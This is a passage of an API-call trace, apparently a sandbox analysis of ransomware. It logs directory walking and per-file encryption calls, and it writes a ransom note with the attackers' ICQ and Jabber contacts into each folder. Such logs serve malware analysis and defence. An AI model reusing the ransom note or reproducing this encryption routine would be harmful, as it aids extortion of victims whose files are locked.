jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.275] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.276] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.276] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.276] CloseHandle (hObject=0x21c) returned 1 [0251.276] GetProcessHeap () returned 0x780000 [0251.276] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.276] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0251.277] lstrcmpiW (lpString1="Ole DB", lpString2="Windows") returned -1 [0251.277] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned 47 [0251.277] lstrcmpW (lpString1="Ole DB", lpString2=".") returned 1 [0251.277] lstrcmpW (lpString1="Ole DB", lpString2="..") returned 1 [0251.277] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.277] GetProcessHeap () returned 0x780000 [0251.277] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0251.277] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*") returned 49 [0251.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.280] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.") returned 49 [0251.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.280] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.280] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.280] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\..") returned 50 [0251.280] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.280] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0251.280] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0251.281] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 53 [0251.281] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0251.281] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0251.281] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.281] GetProcessHeap () returned 0x780000 [0251.281] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.281] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*") returned 55 [0251.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.281] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.282] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.") returned 55 [0251.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.282] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0251.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.282] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\..") returned 56 [0251.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.282] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb6d5cd, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xbeb51b3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xbb6d5cd, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdasqlr.dll.mui", cAlternateFileName="")) returned 1 [0251.282] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="Windows") returned -1 [0251.282] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 70 [0251.282] StrStrIW (lpFirst="msdasqlr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.282] lstrcmpW (lpString1="msdasqlr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.282] lstrcmpW (lpString1="msdasqlr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.282] lstrlenW (lpString=".testttjffg") returned 11 [0251.282] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.282] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.282] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.283] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aabb7e, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8aabb7e, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="oledb32r.dll.mui", cAlternateFileName="")) returned 1 [0251.284] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="Windows") returned -1 [0251.284] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 70 [0251.284] StrStrIW (lpFirst="oledb32r.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.284] lstrcmpW (lpString1="oledb32r.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.284] lstrcmpW (lpString1="oledb32r.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.284] lstrlenW (lpString=".testttjffg") returned 11 [0251.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.285] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb93886, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xbeb51b3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xbb93886, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="sqloledb.rll.mui", cAlternateFileName="")) returned 1 [0251.285] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="Windows") returned -1 [0251.286] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 70 [0251.286] StrStrIW (lpFirst="sqloledb.rll.mui", lpSrch=".horseleader") returned 0x0 [0251.286] lstrcmpW (lpString1="sqloledb.rll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.286] lstrcmpW (lpString1="sqloledb.rll.mui", lpString2="_uninstalling_.png") returned 1 [0251.286] lstrlenW (lpString=".testttjffg") returned 11 [0251.286] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", lpSrch=".testttjffg") returned 0x0 [0251.286] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.286] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.286] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad1e37, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8ad1e37, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 1 [0251.286] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="Windows") returned -1 [0251.287] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 69 [0251.287] StrStrIW (lpFirst="sqlxmlx.rll.mui", lpSrch=".horseleader") returned 0x0 [0251.287] lstrcmpW (lpString1="sqlxmlx.rll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.287] lstrcmpW (lpString1="sqlxmlx.rll.mui", lpString2="_uninstalling_.png") returned 1 [0251.287] lstrlenW (lpString=".testttjffg") returned 11 [0251.287] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", lpSrch=".testttjffg") returned 0x0 [0251.287] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.287] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.287] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad1e37, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8ad1e37, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 0 [0251.287] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.288] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\#Decrypt#.txt") returned 67 [0251.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.291] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.291] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.292] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.292] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.292] CloseHandle (hObject=0x158) returned 1 [0251.293] GetProcessHeap () returned 0x780000 [0251.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.293] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad34e79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9ad34e79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ad5afda, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0251.293] lstrcmpiW (lpString1="msdaosp.dll", lpString2="Windows") returned -1 [0251.293] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 59 [0251.293] StrStrIW (lpFirst="msdaosp.dll", lpSrch=".horseleader") returned 0x0 [0251.293] lstrcmpW (lpString1="msdaosp.dll", lpString2="#Decrypt#.txt") returned 1 [0251.293] lstrcmpW (lpString1="msdaosp.dll", lpString2="_uninstalling_.png") returned 1 [0251.293] lstrlenW (lpString=".testttjffg") returned 11 [0251.293] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll", lpSrch=".testttjffg") returned 0x0 [0251.293] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.293] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.294] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14cd0c35, ftCreationTime.dwHighDateTime=0x1ca041a, 